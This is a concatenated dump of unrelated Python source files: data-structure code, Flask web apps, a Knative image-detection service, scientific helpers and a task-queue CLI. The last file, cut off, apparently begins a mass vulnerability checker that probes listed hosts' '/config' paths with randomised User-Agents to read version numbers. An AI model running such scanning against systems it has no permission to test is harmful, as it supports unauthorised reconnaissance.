the list, looking for the specified element.\n\n        :param element: The element we are looking for.\n        :return: None if the element is not found; the element of the node otherwise.\n        :rtype: element\n        \"\"\"\n        result = None\n        current_node = self.head\n        while current_node != None:\n            if current_node.element == element:\n                result = current_node\n                break\n            current_node = current_node.next\n        if result is None:\n            return None\n        return result.element\n\n    def contains(self, element):\n        \"\"\"\n        Verifies the result of the search query with the given element as parameter.\n\n        :param element: The element which we wish to verify is in the list.\n        :return: True if the list contains the element in one of its nodes; False otherwise.\n        :rtype: boolean\n        \"\"\"\n        return self.search(element) != None\n\n    def reverse(self):\n        \"\"\"\n        Reverses the given list so that the elements at the back will now be at the front and\n        vice versa.\n\n        :return: The resulting list after the operation.\n        :rtype: List\n        \"\"\"\n        reversed_list = List()\n        current_node = self.head\n        while current_node != None:\n            reversed_list.insert_front(current_node.element)\n            current_node = current_node.next\n        return reversed_list\n\n    def clear(self):\n        \"\"\"\n        Removes all the elements from the list.\n        \"\"\"\n        while self.size != 0:\n            self.remove_last()\n\n    def get_first(self):\n        \"\"\"\n        Returns the first element in the list.\n\n        :return: The element held at the head of the list.\n        :rtype: element\n        \"\"\"\n        if self.is_empty():\n            return None\n        return self.head.element\n\n    def get_last(self):\n        \"\"\"\n        Returns the last element in the list.\n\n        :return: The element held at the tail of the list.\n        :rtype: element\n        \"\"\"\n        if self.is_empty():\n            return None\n        return self.tail.element\n\n    def get(self, index):\n        \"\"\"\n        Returns the element that is held at the node at the given index in the list.\n\n        :param index: The query index.\n        :return: The element at the given position.\n        :rtype: element\n        \"\"\"\n        if index < 0 or index >= self.size:\n            return None\n        current_node = self.head\n        count = 0\n        while count != index:\n            current_node = current_node.next\n            count += 1\n        return current_node.element\n\n    def index(self, element):\n        \"\"\"\n        Returns the index of the first occurrence of the given element.\n\n        :param element: The element whose index we are looking for.\n        :return: The index of the element.\n        :rtype: int\n        \"\"\"\n        current_node = self.head\n        count = 0\n        while current_node != None:\n            if current_node.element == element:\n                return count\n            count += 1\n            current_node = current_node.next\n        return -1\n\n    def copy(self):\n        \"\"\"\n        Copies a list.\n\n        :return: A copy of the list.\n        :rtype: List\n        \"\"\"\n        return self._copy_aux(List(), self.head)\n\n    def _copy_aux(self, L, node):\n        
\"\"\"\n Auxiliary method for copying a list.\n\n :param L: The list in which the current list will be copied.\n :param node: The node to be inserted.\n :return: The list resulting from inserting the element to L.\n :rtype: List\n \"\"\"\n if node == None:\n return L\n else:\n L.insert_back(node.element)\n return self._copy_aux(L, node.next)","sub_path":"Python/Data Structures/Lists/List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":9619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"238980243","text":"import logging\n\nfrom flask_jwt_extended import JWTManager\nfrom flask_migrate import Migrate\nfrom flask_restful import Api\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom services.billings.billings_resource import *\n\n\n@app.after_request\ndef after_request(response):\n response.content_type = 'application/json; charset=UTF-8'\n response.content_language = 'ru-RU'\n return response\n\n\napp.config.from_object(Config)\ndb = SQLAlchemy(app)\n\nmigrate = Migrate(app, db)\napi = Api(app)\n\njwt = JWTManager(app)\n\napi.add_resource(BillingResource, '/billings/')\napi.add_resource(BillingCreateResource, '/billings')\napi.add_resource(BillingsTokenResource, '/billings/token')\n\nif __name__ == '__main__':\n file_log = logging.FileHandler(Config.BILLINGS_LOG_PATH)\n console_out = logging.StreamHandler()\n logging.basicConfig(handlers=(file_log, console_out),\n level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(message)s')\n app.run(debug=Config.DEBUG, port=Config.BILLINGS_PORT)\n","sub_path":"services/billings/billings_run.py","file_name":"billings_run.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"181465058","text":"__author__ = 'vampi'\nfrom openerp import tools\nfrom openerp.osv import fields, osv\n\nclass hr_employee_report(osv.Model):\n _name = \"hr.employee.report\"\n _description = \"Employee Statistics\"\n _auto = False\n _columns = {\n 'create_date': fields.datetime('Create Date', readonly=True),\n 'department_id': fields.many2one('hr.department', 'Department'),\n 'job_id': fields.many2one('hr.job', 'Job Title'),\n 'delay_date': fields.float('Delay to Start', digits=(16, 2), readonly=True),\n }\n _order = 'create_date desc'\n\n _depends = {\n 'hr.department': ['id', 'create_date'],\n 'hr.employee': ['create_date', 'job_id', 'department_id', 'id','parent_id'],\n }\n\n def init(self, cr):\n tools.drop_view_if_exists(cr, 'hr_employee_report')\n cr.execute(\"\"\"\n create or replace view hr_employee_report as (\n select\n min(l.id) as id,\n s.create_date as create_date,\n s.department_id,\n s.job_id\n from\n hr_department l\n LEFT JOIN\n hr_employee s on (s.department_id=l.id)\n GROUP BY\n s.create_date,\n s.job_id,\n s.department_id\n )\n \"\"\")\n","sub_path":"hr_report_custom/hr_employee_report.py","file_name":"hr_employee_report.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523159892","text":"\ndef restriction(self,structure):\n\tcs=structure.components\n\tif len(cs)==2:\n\t\tfor x in cs:\n\t\t\tif x:\n\t\t\t\tfor y in x:\n\t\t\t\t\tif y:\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\treturn False\nname='Two 
Components'\n","sub_path":"Restrictions/two_component_restriction.py","file_name":"two_component_restriction.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"7674239","text":"# @Author: Jenkins Alec \n# @Date: 2017-01-24T17:52:32-08:00\n# @Project: LTSPM analysis\n# @Last modified by: alec\n# @Last modified time: 2017-04-10T09:48:40-07:00\n\n\nimport numpy as np\nimport json\n\nfilespec = 'Msfixed'\nsavepath = '/Users/alec/UCSB/cofeb_analysis_data/ta/cal_parameters_'+filespec+'.json'\n\n# in Si units\nMst = (6.54577e-4)\nMstError = 1.01402555e-5\nt = 1.0e-9\nMs = Mst/t\nKeff = 8.20955e3\nDW_width = 36.991e-9\nAex = 1.1233e-11\n\n# radians and m\nheight = 63.4248e-9 # calibrated height using +/- 3 points from cal peak and fitted finite edge width\nheightError = 4.861e-9\ntheta = 1.033522705227361 # extracted from Bz0 and NV splitting away from edge\nthetaError = 0.1089657# std of Bz0 and NV splitting away from edge\nphi = 0\n\n# m\nscanSize = 0.6*(5e-6)\n\ncalparams = {'Ms':Ms, 't':t, 'MstError':MstError, 'theta':theta,\n 'thetaError':thetaError, 'phi':phi, 'height':height, 'heightError':heightError, 'Keff':Keff,\n 'Aex':Aex, 'DW_width':DW_width, 'scanSize':scanSize}\n\nwith open(savepath, 'w') as fwrite:\n json.dump(calparams, fwrite)\n","sub_path":"cofeb_analysis/ta/1760/set_cal_params.py","file_name":"set_cal_params.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"282374445","text":"# Team Mongo-Lians\n# Joan Chirinos, Aaron Li, Joyce Liao\n\nimport os\n\nfrom flask import Flask, render_template, redirect, url_for, session, request, flash, get_flashed_messages\nimport pprint\n\nfrom util import pokemon as pk\nfrom util import history as hist\nfrom util import mongo \n\napp = Flask(__name__)\napp.secret_key = os.urandom(32)\n\n@app.route('/')\ndef landing():\n return render_template('landing.html')\n\n@app.route('/pokemon')\ndef pokemonLanding():\n return render_template('pokemonLanding.html')\n\n@app.route('/history')\ndef historyLanding():\n return render_template('historyLanding.html')\n\n@app.route('/nobel')\ndef nobelLanding():\n return render_template(\"nobel.html\")\n\n@app.route('/getPokemen', methods=[\"POST\"])\ndef getMen():\n\n # connect to DB\n client = pk.connect('69.55.59.139')\n db = pk.getDatabase(client, 'test')\n collection = pk.getCollection(db, 'pokemon')\n\n types = request.form.getlist('type')\n id = request.form.get('id')\n weaknesses = request.form.getlist('weak')\n all = request.form.get('all')\n\n query = {}\n if all:\n qtypes = [{'type': i} for i in types]\n qweaknesses = [{'weaknesses': i} for i in weaknesses]\n query = {'$and': qtypes + qweaknesses}\n if id.strip() != '':\n query['id'] = int(id)\n fields = {'_id': 0, 'name': 1, 'weaknesses': 1, 'type': 1, 'img': 1, 'id': 1}\n print('QUERY:')\n pprint.pprint(query)\n print('FIELDS')\n pprint.pprint(fields)\n pokemon = pk.findDocuments(collection, query, fields)\n hasmon = False\n print('OUT')\n pokelist = []\n for i in pokemon:\n pokelist.append(i)\n hasmon = True\n print(pokelist)\n return render_template('pokemonGet.html', hasmon=hasmon, pokemon=pokelist, types=', '.join(types), weaknessess=', '.join(weaknesses), id=id)\n else:\n qtypes = [{'type': i} for i in types]\n qweaknesses = [{'weaknesses': i} for i in weaknesses]\n if qtypes == []:\n qtypes = [{}]\n if qweaknesses == []:\n qweaknesses = [{}]\n query = 
{'$and': [{'$or': qtypes}, {'$or': qweaknesses}]}\n if id.strip() != '':\n query['id'] = int(id)\n fields = {'_id': 0, 'name': 1, 'weaknesses': 1, 'type': 1, 'img': 1, 'id': 1}\n print('QUERY:')\n pprint.pprint(query)\n print('FIELDS')\n pprint.pprint(fields)\n pokemon = pk.findDocuments(collection, query, fields)\n print('OUT')\n pokelist = []\n hasmon = False\n for i in pokemon:\n pokelist.append(i)\n hasmon = True\n print(pokelist)\n return render_template('pokemonGet.html', hasmon=hasmon, pokemon=pokelist, types=', '.join(types), weaknesses=', '.join(weaknesses), id=id)\n\n@app.route('/hist', methods=[\"POST\"])\ndef retHist():\n # connect\n SERVER_ADDR = \"69.55.59.139\" # Aaron\n client = hist.connect(SERVER_ADDR)\n db = client.history\n col = db.files\n hist.imp(db, col)\n\n date = request.form.get(\"date\")\n phrase = request.form.get(\"phrase\")\n print(\"\\n\\n\", date, phrase, \"\\n\\n\")\n if not date and phrase != \"\":\n data = hist.find(str(phrase), col)\n if data != -1:\n return render_template(\"history.html\", phrases = data, descs = -1)\n elif date != \"\" and not phrase:\n data = hist.yearDesc(str(date), col)\n if data[0] != -1:\n return render_template(\"history.html\", phrases = -1, descs = data[1:])\n else:\n if type(date) == type(\"\") and type(phrase) == type(\"\"):\n phrases = hist.find(str(phrase), col)\n dates = hist.yearDesc(str(date), col)\n if phrases != -1 and dates[0] != -1:\n print(\"\\n\\n\", phrases, \"\\ndates\\n\", dates, \"\\n\\n\")\n return render_template(\"history.html\", phrases = phrases, descs = dates[1:])\n\n# def getData():\n# type = request.args[\"type\"]\n# data = mongo.getData(request.args[\"arg\"], type)\n# return render_template(\"result.html\", data=data)\n\n# @app.route(\"/launch\")\n# def launch():\n# addr = request.args[\"ip\"]\n# mongo.launchDB(addr)\n# return redirect(url_for(\"nobelLanding\"))\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","sub_path":"08_mongosite/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"640259272","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport argparse\nimport sys\nimport pandas as pd\nimport subprocess\nimport pdb\n\n#Arguments for argparse module:\nparser = argparse.ArgumentParser(description = '''A program that parses TMalign output.''')\n \nparser.add_argument('id_file', nargs=1, type= str,\n default=sys.stdin, help = 'path to pdb ids file. 
Structure: #uid\tpdb_id.')\n\nparser.add_argument('align_file', nargs=1, type= str,\n default=sys.stdin, help = 'path to file with TMalign output.')\n\n#Functions\ndef get_pairwise_dist(file_path, df):\n\t'''A function that gets the uids and the corresponding scores\n\tand returns them as lists.\n\t'''\n\n\tuid_pairs = [] #List with unique ids\n\n\t#df.loc[df['pdb'] == '1zmq']\n\tprint('uid1' + '\\t' + 'uid2' + '\\t' + 'RMSD')\n\twith open(file_path) as file:\n\t\tfor line in file:\n\t\t\tif 'Name of Chain' in line:\n\t\t\t\tline = line.rstrip() #remove \\n\n\t\t\t\tline = line.split(\"/\") #split on /\n\t\t\t\tpdb_id = line[-1].split(\".\")[0] #Get pdb id\n\t\t\t\tuid =df.loc[df['pdb'] == pdb_id]['#uid'].values[0] #Get corresponding uid\n\t\t\t\t\n\t\t\t\tuid = str(uid).zfill(9)\n\t\t\t\tuid_pairs.append(uid)\n\n\t\t\tif 'RMSD' in line:\n\t\t\t\tline = line.rstrip() #remove \\n\n\t\t\t\tline = line.split(\",\") #split on ,\n\t\t\t\tRMSD = line[1].split(' ')[-1] #Split on space\n\n\t\t\t\tprint(uid_pairs[0] + '\\t' + uid_pairs[1] + '\\t' + str(RMSD))\n\t\t\t\tuid_pairs = [] #reset list of pairs\n\n\n\n\treturn None\n\n\n#Main program\nargs = parser.parse_args()\n\nid_file = args.id_file[0]\nalign_file = args.align_file[0]\n\n#Read tsv file as pandas dataframe\ndf = pd.read_csv(id_file, sep='\\t')#get_ids\n\npdb_ids = df['pdb']\nuids = df['#uid']\n\n#Get pairwise RMSD and print in tsv\nget_pairwise_dist(align_file, df)\n","sub_path":"ECOD/parse_rmsd.py","file_name":"parse_rmsd.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"581011845","text":"# -*- coding: utf-8 -*-\n# adminPages.py\n\nfrom flask import Blueprint,Flask, jsonify, render_template, request,make_response,redirect\nimport json\nimport config\nimport model\nimport formr\nimport time\n\n\nimport adminModel\n\nadmin = Blueprint('admin', __name__)\ndef connectdb():\n db = config._db_Conn_()\n conn = db._db_()\n cur = conn.cursor()\n return (db,cur)\n\ndef closedb(db,cur):\n db.close()\n cur.close()\n\n@admin.route('/login',methods = ['GET', 'POST'] )\ndef login():\n form = formr.login()\n if form.validate_on_submit():#判断表单是否都填写了\n print(form.dlzh.data)\n return render_template(\"ryxz.html\",form=form)\n\n\n@admin.route('/zcgz')\ndef zcgz():\n app=\"BSDW2017082300001\"\n time2=time.strftime(\"%Y-%M-%d %H:%M:%S\")\n tbr=\"admin\"\n return render_template(\"zcgz.html\",app=app,time2=time2,tbr=tbr)\n\n@admin.route('/wztj')\ndef wztj():\n return render_template(\"wztj.html\")\n\n#组织管理\n@admin.route('/zzgl')\ndef zzgl():\n return render_template(\"zzgl.html\")\n\n@admin.route('/xlgl')\ndef xlgl():\n return render_template(\"xlsjgl.html\")\n\n@admin.route('/xlgl2',methods = ['GET', 'POST'])\ndef xlgl2():\n rows = request.args.get('rows', 0, type=int)\n page = request.args.get('page', 0, type=int)\n flbs = request.args.get('flbs', 0, type=str)\n flmc = request.args.get('flmc', 0, type=str)\n ac=adminModel.dmflq()\n _re_json_=ac.query(flbs,flmc,rows,page)\n return json.dumps(_re_json_)\n\n@admin.route('/xlgl3',methods = ['GET', 'POST'])\ndef xlgl3():\n rows = request.args.get('rows', 0, type=int)\n page = request.args.get('page', 0, type=int)\n flbs = request.args.get('flbs', 0, type=str)\n ac=adminModel.dmxlq()\n _re_json_=ac.query(flbs,rows,page)\n return json.dumps(_re_json_)\n\n@admin.route('/delxl',methods = ['GET', 'POST'])\ndef delxl():\n flbs = request.form.get(\"flbs\")\n ac=adminModel.dmflq()\n _re_json_=ac.delxl(flbs)\n return 
json.dumps(\"su\")\n\n@admin.route('/delxlbm',methods = ['GET', 'POST'])\ndef delxlbm():\n dmbm = request.form.get(\"dmbm\")\n print(dmbm)\n ac=adminModel.dmxlq()\n _re_json_=ac.delxlbm2(dmbm)\n return json.dumps(\"su\")\n\n\n@admin.route('/addxldm',methods = ['GET', 'POST'] )\ndef addxldm():\n form = formr.addxldm()\n return render_template(\"addxlbm.html\",form=form)\n\n\n@admin.route('/zzcx',methods = ['GET', 'POST'] )\ndef zzcx():\n rows = request.args.get('rows', 0, type=int)\n page = request.args.get('page', 0, type=int)\n zzbm = request.args.get('dlzh', 0, type=str)\n zzmc = request.args.get('rymc', 0, type=str)\n sjzzbm =request.args.get('sjzzbm', 0, type=str)\n print(rows)\n print(page)\n ac = model.busi()\n _re_json_ = ac.query(zzbm,zzmc,sjzzbm,rows,page)\n return json.dumps(_re_json_)\n\n@admin.route('/zzxz',methods = ['GET', 'POST'] )\ndef zzxz():\n form = formr.busi()\n return render_template(\"zzxz.html\",form=form)\n\n@admin.route('/zzxz2',methods=['POST'])\ndef zzxz2():\n data=request.form\n form = formr.MyForm()\n print(data)\n busi=model.busi()\n busi.addBusi(data)\n return \"success\"\n\n@admin.route('/zzsc',methods = ['GET', 'POST'])\ndef zzsc():\n print(\"in\")\n data=request.form\n print(data)\n busi=model.busi()\n busi.delBusi(data[\"zzbm\"])\n return \"success\"\n\n@admin.route('/ryxz/',methods = ['GET', 'POST'] )\ndef ryxz():\n form = formr.MyForm()\n print(form.dlzh)\n return render_template(\"ryxz.html\",form=form)\n\n@admin.route('/rofl/',methods = ['GET', 'POST'] )\ndef rofl():\n rybs = request.args.get('rybs', 0, type=str)\n print(rybs)\n return render_template(\"rofl.html\",rybs=rybs)\n\n@admin.route('/srofl',methods = ['GET', 'POST'] )\ndef srofl():\n form = request.form.getlist(\"js\")\n rybs=request.form.get(\"rybs\")\n rs=model.rofl()\n rs.save(form,rybs)\n return \"123\"\n\n@admin.route('/trofl',methods = ['GET', 'POST'] )\ndef trofl():\n tr=[{ \"id\":1, \"pId\":0, \"name\":\"业务角色\", \"open\":\"true\"},\n { \"id\":11, \"pId\":1, \"name\":\"业扩专责\", \"open\":\"true\",\"checked\":\"true\"},\n { \"id\":12, \"pId\":1, \"name\":\"计量专责\", \"open\":\"true\"},\n { \"id\":13, \"pId\":1, \"name\":\"营销专责\", \"open\":\"true\"},\n { \"id\":2, \"pId\":0, \"name\":\"系统角色\", \"open\":\"false\"},\n { \"id\":21, \"pId\":2, \"name\":\"管理员\", \"open\":\"true\"},\n { \"id\":22, \"pId\":2, \"name\":\"操作员\", \"open\":\"true\",\"checked\":\"true\"}]\n return json.dumps(tr)\n\n@admin.route('/sumit/',methods = ['GET', 'POST'] )\ndef sumit():\n form = formr.MyForm()\n if form.validate_on_submit():#判断表单是否都填写了\n print(form.dlzh.data)\n return render_template(\"ryxz.html\",form=form)\n\n@admin.route('/rycx',methods = ['GET', 'POST'] )\ndef rycx():\n rows = request.args.get('rows', 0, type=int)\n page = request.args.get('page', 0, type=int)\n dlzh = request.args.get('dlzh', 0, type=str)\n rymc = request.args.get('rymc', 0, type=str)\n zzbm = request.args.get('zzbm', 0, type=str)\n ac = model.user()\n _re_json_ = ac.query2(dlzh,rymc,zzbm)\n return json.dumps(_re_json_)\n\n@admin.route('/ryxz2',methods=['POST'])\ndef ryxz2():\n data=request.form\n form = formr.MyForm()\n if form.validate_on_submit():\n user=model.user()\n user.addUser(data)\n return \"success\"\n else:\n return \"erro\"\n #return \"success\"\n\n\n@admin.route('/addxl',methods=['POST'])\ndef addxl():\n data=request.form\n user=adminModel.dmxlq()\n user.addxl(data)\n return \"success\"\n\n #return \"success\"\n\n@admin.route('/rysc',methods = ['GET', 'POST'])\ndef rysc():\n print(\"in\")\n data=request.form\n 
user=model.user()\n user.delUser(data[\"rybs\"])\n return \"success\"\n\n@admin.route('/getxl',methods = ['GET', 'POST'])\ndef getxl():\n ac=adminModel.dmxlq()\n _re_json_=ac.query2()\n print(_re_json_)\n print(\"---------------11\")\n return json.dumps(_re_json_)\n\n@admin.route('/getxl2',methods = ['GET', 'POST'])\ndef getxl2():\n ac=adminModel.dmxlq()\n _re_json_=ac.query3()\n print(\"---------------11\")\n return _re_json_","sub_path":"adminPages.py","file_name":"adminPages.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"300722774","text":"class Solution(object):\n def sortColors(self, nums):\n def sortNumber(left, right, number):\n while left <= right:\n while left <= right and nums[left] != number:\n left += 1\n while left <= right and nums[right] == number:\n right -= 1\n if left <= right:\n nums[left], nums[right] = nums[right], nums[left]\n left += 1\n right -= 1\n return right\n if len(nums) <= 1:\n return nums\n left, right = 0, len(nums) - 1\n left, right = 0, sortNumber(left, right, 2)\n sortNumber(left, right, 1)\n return nums\n\n\n'''\nhttps://leetcode-cn.com/problems/sort-colors/\nFirst idea: find where each number belongs and put it in its place.\n\nBut this is really the partition step from quicksort:\npick a pivot number, everything on one side is larger and everything on the other side is smaller.\nThe difference from plain quicksort: we know there are only three values, so we keep three indices, one each for the 0-region, the 1-region and the 2-region:\n[0:zero] only 0s\n(zero, i) only 1s\n[two:] only 2s\n\nIn short, whenever partitioning is involved: think quicksort.\n'''\nclass Solution(object):\n def sortColors(self, nums):\n if len(nums) <= 1:\n return nums\n zero = -1\n i = 0\n two = len(nums) - 1\n while i <= two:\n if nums[i] == 0:\n zero += 1\n nums[i], nums[zero] = nums[zero], nums[i]\n i += 1\n elif nums[i] == 1:\n i += 1\n elif nums[i] == 2:\n nums[i], nums[two] = nums[two], nums[i]\n # the value swapped in from index two is unknown, so we cannot do i += 1 here\n two -= 1\n return nums\n\n\n\n'''\ntest case:\n1.\n[2,1]\n'''\nif __name__ == \"__main__\":\n a = Solution()\n nums = [1,2,1]\n print(a.sortColors(nums))\n\n","sub_path":"All_about_sorted/quickSort/Leetcode_75/lc75.py","file_name":"lc75.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"24719510","text":"import os\nimport time\nimport logging\n\nfrom flask import Flask, request, make_response\nfrom cloudevents.http import CloudEvent, to_structured, from_http\n\nimport requests\n\nimport uuid\nimport cv2\nimport json\nimport base64\nimport numpy as np\n\n# Predict using TensorFlow\nfrom tensorflowyolo import TensorflowYolo\n\n\nmy_tf = None\nce_action_type = None\nce_action_source = None\nkn_broker_url = None\n\ndef convert_b64jpeg_to_image(b64jpeg):\n\n # Decode base64 string into bytes\n img_bytes = base64.b64decode(b64jpeg)\n \n # Convert into an np array \n jpg_as_np = np.frombuffer(img_bytes, dtype=np.uint8)\n\n # Decode into cv2 image\n return cv2.imdecode(jpg_as_np, flags=1) \n\ndef convert_image_to_jpeg(image):\n # Encode frame as jpeg\n frame = cv2.imencode('.jpg', image)[1].tobytes()\n\n # Encode frame in base64 representation and remove utf-8 encoding\n frame = base64.b64encode(frame).decode('utf-8')\n return \"data:image/jpeg;base64,{}\".format(frame)\n\napp = Flask(__name__)\n\n@app.route('/', methods=['POST'])\ndef process_image():\n # app.logger.debug(request.headers)\n\n # create a CloudEvent\n event = from_http(request.headers, request.get_data())\n\n # you can access cloudevent fields as seen below\n app.logger.info(\n f\"Found {event['id']} from {event['source']} with type \"\n f\"{event['type']} and specversion {event['specversion']}\"\n )\n # 
app.logger.info(event)\n\n data = event.data\n\n if 'image' in data and 'time' in data:\n\n frame = convert_b64jpeg_to_image(data['image'].split(',')[1])\n\n app.logger.info(data['time'] + \" \" + str(frame.shape))\n\n\n # check / set cam ID\n cam_id = 0\n if 'id' in data:\n cam_id = data['id']\n\n\n # Call TF Yolo for object (damage) detection\n\n start = time.time()\n detected_classes, image_pred = my_tf.predict(frame)\n end = time.time()\n app.logger.info('Predict: Total object detection took {:.5f} seconds'.format(end - start))\n\n if detected_classes:\n\n app.logger.info(detected_classes)\n status = 1\n\n # Create a CloudEvent\n # - The CloudEvent \"id\" is generated if omitted. \"specversion\" defaults to \"1.0\".\n try:\n attributes = {\n 'type': ce_action_type,\n 'source': ce_action_source,\n }\n event_data = {\n 'uuid': str(uuid.uuid4()), # TO-DO: Please with event uuid\n 'failure': detected_classes,\n 'status': status,\n 'time': data['time']\n }\n event = CloudEvent(attributes, event_data)\n\n # Creates the HTTP request representation of the CloudEvent in structured content mode\n headers, body = to_structured(event)\n\n # POST\n requests.post(kn_broker_url, data=body, headers=headers)\n\n except:\n app.logger.error(f'Failed to send CloudEvent to: {kn_broker_url}')\n\n else:\n status = 0\n\n text = data['time']\n\n # Respond with another event (optional)\n response = make_response({\n 'text': text,\n 'id': cam_id,\n 'status': status,\n 'image': convert_image_to_jpeg(image_pred),\n })\n response.headers[\"Ce-Id\"] = str(uuid.uuid4())\n response.headers[\"Ce-specversion\"] = \"1.0\"\n response.headers[\"Ce-Source\"] = \"manuela/eventing/image-processor\"\n response.headers[\"Ce-Type\"] = \"manuela.image-processor.response\"\n else:\n app.logger.warning(\"Payload not valid.\")\n response = make_response({\n 'msg': 'Payload not valid'\n })\n return response\n\n\nif __name__ == '__main__':\n\n app.logger.setLevel(logging.DEBUG)\n app.logger.info(\"Configure TF based Yolo neural network ...\")\n tfmodel_path = os.getenv(\"TF_MODEL_PATH\", default=\"./tf-model\")\n\n ce_action_type = os.getenv(\"CE_ACTION_TYPE\", default=\"manuela.image-processor.action\")\n ce_action_source = os.getenv(\"CE_ACTION_SOURCE\", default=\"manuela/eventing/image-processor\")\n kn_broker_url = os.getenv(\"KN_BROKER_URL\", default=\"http://broker-ingress.knative-eventing.svc.cluster.local/sbergste-knative/default\")\n\n my_tf = TensorflowYolo(tfmodel_path=tfmodel_path)\n\n app.run(debug=False, host='0.0.0.0', port=8080)","sub_path":"image-processor/image-processor.py","file_name":"image-processor.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102208614","text":"#!/usr/bin/env python3\n\nfrom sys import argv\nfrom models import *\nfrom os import listdir\nfrom os.path import isfile, join\n\ndef help():\n print(\"Adds a task, a version or a constraint to the database.\")\n print(\"subcommands:\")\n print(\"\\ttask ...\\t\\t\\tadds tasks\")\n print(\"\\ttask_dir \\t\\t add all files in as task\")\n print(\"\\tversion ...\\t\\tadds version\")\n print(\"\\tconstraint \\tadds constraint\")\n print(\"\\twork all for all lvls\")\n print(\"\\twork imperfect for all imperfect lvls\")\n\ndef add_task(paths):\n connect()\n for p in paths:\n Task.create(path=p)\n close()\n\ndef add_task_dir(paths):\n connect()\n for p in paths:\n tasks = set([t.path for t in Task.select()])\n print(\"Found\", len(tasks), \"task 
files.\")\n\n files = [str(f) for f in listdir(p) if isfile(join(p, f)) and f not in tasks]\n print(\"Found\", len(files), \" tasks in DB\")\n files_dict = [{\"path\": f} for f in files]\n\n with database.atomic():\n for idx in range(0, len(files_dict), 100):\n Task.insert_many(files_dict[idx:idx+100]).execute()\n close()\n\ndef add_version(paths):\n connect()\n for p in paths:\n Version.create(reference=p)\n close()\n\ndef add_constraint(name, runtime_ms, cores):\n connect()\n Constraint.create(runtime_ms=runtime_ms, cores=cores, name=name)\n close()\n\ndef add_work(args):\n if args[0] == \"imperfect\":\n help() if len(args) < 5 else add_work_imperfect(args[1], args[2], args[3], args[4])\n elif args[0] == \"all\":\n help() if len(args) < 5 else add_work_all(args[1], args[2], args[3], args[4])\n else:\n help()\n\ndef add_work_imperfect(reference, constraint, count, priority):\n print(\"JOIN DOES NOT WORK YET :(\")\n connect()\n version=Version.get(reference=reference)\n constraint=Constraint.get(name=constraint)\n #we use list() to make faster?\n tasks = Task.select().where(Run.score != 1.0 or Run << None).group_by(Task).join(Run)\n print(\"tasks.count\", tasks.count())\n return\n Work.enque(tasks, version, constraint, priority, count)\n close()\n\ndef add_work_all(reference, constraint, count, priority):\n connect()\n version=Version.get(reference=reference)\n constraint=Constraint.get(name=constraint)\n tasks = Task.select()\n print(\"tasks.count\", tasks.count())\n Work.enque(tasks, version, constraint, priority, count)\n #we use list() to make faster?\n #for task in list(Task.select()):\n #Work.enque(task, version=version, constraint=constraint, priority=priority, count=count)\n close()\n\ndef add(args):\n if args[0] == \"task\":\n add_task(args[1:])\n elif args[0] == \"task_dir\":\n add_task_dir(args[1:])\n elif args[0] == \"version\":\n add_version(args[1:])\n elif args[0] == \"constraint\":\n help() if len(args) < 4 else add_constraint(args[1], args[2], args[3])\n elif args[0] == \"work\":\n add_work(args[1:])\n else:\n help()\n\ndef main():\n if len(argv) < 3:\n help()\n return\n add(argv[1:])\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"meta/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"406746851","text":"import requests\r\nimport re\r\nimport sys\r\nimport urllib3\r\nfrom argparse import ArgumentParser\r\nimport threadpool\r\nfrom urllib import parse\r\nfrom time import time\r\nimport random\r\n\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\nfilename = sys.argv[1]\r\nurl_list=[]\r\n\r\n#随机ua\r\ndef get_ua():\r\n\tfirst_num = random.randint(55, 62)\r\n\tthird_num = random.randint(0, 3200)\r\n\tfourth_num = random.randint(0, 140)\r\n\tos_type = [\r\n\t\t'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',\r\n\t\t'(Macintosh; Intel Mac OS X 10_12_6)'\r\n\t]\r\n\tchrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)\r\n\r\n\tua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',\r\n\t\t\t\t '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']\r\n\t\t\t\t )\r\n\treturn ua\r\n\r\n#获取版本信息\r\ndef check_vuln(url):\r\n\turl = parse.urlparse(url)\r\n\turl1 = url.scheme + '://' + url.netloc\r\n\turl2 = url.scheme + '://' + url.netloc + '/config'\r\n\theaders = {'User-Agent': get_ua()}\r\n\ttry:\r\n\t\tres = requests.get(url2,timeout=15,verify=False)\r\n\t\tversion = 
